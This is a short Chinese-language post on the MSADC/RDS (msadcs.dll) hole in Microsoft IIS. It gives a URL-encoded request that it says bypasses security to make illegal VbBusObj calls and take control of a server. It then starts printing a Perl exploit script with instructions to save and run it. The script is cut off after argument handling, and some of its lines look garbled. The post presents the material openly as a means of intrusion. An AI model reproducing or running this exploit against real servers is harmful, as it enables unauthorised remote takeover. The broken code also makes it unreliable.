|
CGI漏洞(31) 通过web远程访问ODBC,获取系统的控制权.、如果web目录下的/msadc/msadcs.dll/可以访问,
那么ms的任何补丁可能都没用,用类似:
/%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset
的请求,就可以绕过安全机制进行非法的VBBusObj请求,从而达到入侵的目的。
攻击程序:
#将下面这段保存为txt文件,然后: "perl -x 文件名"
#!perl
#
# MSADC/RDS ‘usage‘ (aka exploit) script
#
# by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors! use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args); print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n"; if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h { -d -X -v }
-h = host you want to scan (ip or domain)
-d = delay between calls, default 1 second
-X = dump Index Server path table, if available
-v = verbose
-e = external dictionary file for step 5 Or a -R will resume a command session ~; exit;} $ip=$args{h}; $clen=0; $reqlen=0; $=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) die("inet_aton problems; host doesn‘t exist?";}
| 
